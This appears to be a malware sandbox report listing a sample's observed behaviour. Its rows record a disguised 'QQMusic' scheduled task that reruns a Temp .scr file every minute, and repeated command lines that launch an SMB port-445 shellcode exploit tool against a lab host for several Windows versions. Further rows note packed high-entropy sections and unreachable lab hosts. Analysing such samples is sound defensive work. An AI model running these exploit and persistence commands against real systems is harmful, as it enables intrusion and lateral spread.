cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2003_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target VISTA_SP2 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP0 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target XP_SP0SP1_X86 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
cmdline | svchostromance.exe --OutConfig 192.168.56.103.txt --TargetIp 192.168.56.103 --TargetPort 445 --Protocol SMB --Target SERVER_2008_SP1 --ShellcodeFile Shellcode.ini --PipeName browser --CredChoice 0 --InConfig svchostromance.xml |
file | C:\ProgramData\svchostromance.exe |
file | C:\ProgramData\svchostlong.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "spreadEmnopq.exe") |
section | {u'size_of_data': u'0x0053aa00', u'virtual_address': u'0x00397000', u'entropy': 7.933859471955468, u'name': u'.rsrc', u'virtual_size': u'0x0053a990'} | entropy | 7.93385947196 | description | A section with a high entropy has been found | |||||||||
entropy | 0.58321533602 | description | Overall entropy of this PE file is high |
cmdline | taskkill /f /im spreadEmnopq.exe |
cmdline | ipconfig /flushdns |
cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
cmdline | schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\test22\AppData\Local\Temp\help.scr /F |
dead_host | 192.168.56.101:49373 |
dead_host | 192.168.56.101:49629 |
dead_host | 192.168.56.103:1433 |
dead_host | 192.168.56.103:19490 |
dead_host | 192.168.56.1:19490 |
dead_host | 192.168.56.1:21 |
dead_host | 192.168.56.101:50767 |
dead_host | 192.168.56.1:135 |
dead_host | 192.168.56.101:50801 |
dead_host | 192.168.56.101:49184 |
dead_host | 192.168.56.101:49291 |
dead_host | 192.168.56.101:50222 |
dead_host | 192.168.56.1:445 |
dead_host | 192.168.56.101:50778 |
dead_host | 192.168.56.101:49928 |
dead_host | 192.168.56.101:50587 |
dead_host | 192.168.56.101:50640 |
dead_host | 192.168.56.1:1433 |
dead_host | 192.168.56.103:21 |
dead_host | 192.168.56.101:50004 |